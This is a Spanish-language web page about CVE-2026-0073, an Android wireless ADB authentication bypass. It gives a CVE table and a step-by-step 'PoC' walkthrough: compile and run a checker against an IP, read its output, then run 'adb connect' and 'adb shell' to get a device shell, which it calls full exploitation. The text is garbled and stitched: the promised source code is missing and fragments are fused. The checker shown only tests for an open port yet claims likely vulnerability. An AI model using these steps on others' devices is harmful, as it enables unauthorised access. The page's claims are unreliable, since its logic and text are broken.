
CVE-2026-0073
CVE-2026-0073 es una vulnerabilidad crítica de omisión de autenticación en el ADB inalámbrico de Android (demonio adbd).
Un atacante en la misma red puede omitir la autenticación TLS mutua y conectarse al dispositivo sin la aprobación del usuario ni emparejamiento previo.
| Elemento | Detalles |
|---|---|
| ID CVE | CVE-2026-0073 |
| Gravedad | Crítica |
| Puntuación CVSS | 8.8 |
| Componente afectado | adbd (Android Debug Bridge) - Manejador TLS |
| Tipo | Omisión de autenticación |
| Impacto | Acceso remoto al shell (usuario shell) |
| Corregida | Boletín de seguridad de Android de mayo de 2026 |
Corregido en: nivel de parche de seguridad 2026-05-01 y posteriores.
shelladbd_tls_verify_cert()El error ocurre porque el archivo CVE-2026-0073-Checker.cpp aún no existe.
nano CVE-2026-0073-Checker.cpp
Copia y pega el código completo a continuación en el editor:
Guarda y sal (Ctrl + X → Y → Enter)
Compila de nuevo:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
Esto es exactamente lo que verás si el programa C++ funciona correctamente en un dispositivo Android vulnerable:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN en verde → El puerto ADB está a la escucha.Ejecuta estos comandos:
adb connect 192.168.1.105:5555
Si dice:
connected to 192.168.1.105:5555
Entonces escribe:
adb shell
Deberías obtener acceso al dispositivo:
pixel8:/ $
Eso es explotación completamente exitosa.
Este PoC es solo para fines educativos y pruebas autorizadas.
Solo puedes usar esta herramienta en dispositivos que te pertenezcan o sobre los que tengas permiso explícito para realizar pruebas. El uso no autorizado es ilegal y está estrictamente prohibido.
Úsalo bajo tu propio riesgo. El autor no se hace responsable de ningún daño o consecuencia legal.
🎯 Hecho con precaución: úsalo solo en dispositivos autorizados.